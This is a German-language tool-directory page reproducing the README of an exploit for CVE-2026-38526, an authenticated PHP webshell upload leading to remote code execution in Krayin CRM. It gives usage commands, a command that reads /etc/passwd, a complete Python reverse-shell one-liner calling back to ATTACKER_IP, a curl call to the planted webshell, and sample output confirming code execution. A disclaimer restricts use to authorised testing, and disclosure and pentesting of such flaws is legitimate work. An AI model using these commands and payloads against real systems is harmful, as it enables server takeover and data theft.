Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2026-38526 — Automatisierter Exploit für Krayin CRM ≤ 2.2.x. | Kitploit
Tools/GitHubGitHub/b0nyo/poc-cve-2026-38526
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

Automatisierter Exploit für Krayin CRM ≤ 2.2.x.

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-38526 - Krayin CRM PHP-Upload-RCE

Automatisierter Exploit für Krayin CRM ≤ 2.2.x. Dieses Skript nutzt eine Schwachstelle durch uneingeschränkten Datei-Upload im TinyMCE-Endpunkt (/admin/tinymce/upload) aus, umgeht die MIME-Typ-Validierung durch Vortäuschen von image/jpeg, lädt eine PHP-Webshell hoch und führt beliebige Befehle mit den Rechten des Webservers aus.


Details zur Schwachstelle

EigenschaftWert
CVE-IDCVE-2026-38526
Betroffene SoftwareKrayin CRM ≤ 2.2.x
SchwachstellentypUneingeschränkter Datei-Upload → Remotecodeausführung
AuthentifizierungErforderlich (jedes gültige Administratorkonto)
EndpunktPOST /admin/tinymce/upload

Voraussetzungen

  • Python 3.7+
  • Gültige Administrator-Anmeldedaten für die Zielinstanz von Krayin CRM
  • Netzwerkzugriff auf die Zielanwendung
  • requests-Bibliothek

Installation

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

Verwendung

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

Argumente

FlagBeschreibungBeispiel
-iZiel-URL (mit oder ohne http://)http://target.com oder target.com
-uAdmin-E-Mail/Benutzername[email protected]
-pAdmin-PasswortAdminPassword123!
-cAuszuführender Befehl (Standard: id)whoami

Beispiele

root@kitploit:~
# Grundprüfung
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Benutzerdefinierter Befehl
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse Shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

Exploit-Ablauf

  1. Authentifizierung: CSRF-Token aus der Login-Seite extrahieren und sich mit den bereitgestellten Anmeldedaten authentifizieren
  2. Sitzungsvalidierung: Neues CSRF-Token aus dem authentifizierten Dashboard extrahieren
  3. Webshell-Upload: PHP-Payload mit gefälschtem MIME-Typ an /admin/tinymce/upload hochladen
  4. Befehlsausführung: Beliebige Befehle über den GET-Parameter der Webshell ausführen

Beispielausgabe

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

Häufige Probleme

Authentifizierung fehlgeschlagen: Überprüfen Sie, ob die Anmeldedaten korrekt sind und das Konto auf dem Zielsystem existiert.

CSRF-Token-Extraktion fehlgeschlagen: Stellen Sie sicher, dass das Zielsystem eine verwundbare Krayin-CRM-Version ausführt und der Login-Endpunkt erreichbar ist.

Reverse Shell stellt keine Verbindung her: Stellen Sie sicher, dass Ihr Listener läuft (nc -lvnp <PORT>), Firewall-Regeln ausgehende Verbindungen erlauben und die IP-/Port-Angaben im Payload korrekt sind.


Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Benutzer sind allein dafür verantwortlich, dass sie vor dem Testen eines Zielsystems über die entsprechende Autorisierung verfügen. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Referenzen

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Unrestricted File Upload

Autor

b0nyo - PoC-Implementierung

  • GitHub

TREXNEGRO - Entdeckung der Schwachstelle

  • Security Advisories
Tool herunterladen